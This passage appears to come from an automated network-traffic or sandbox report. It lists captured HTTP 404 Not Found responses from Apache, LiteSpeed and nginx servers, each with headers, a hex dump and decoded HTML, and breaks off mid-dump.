Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:23:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:23:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:23:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:23:34 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:23:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:23:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:23:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:23:48 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 08:23:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 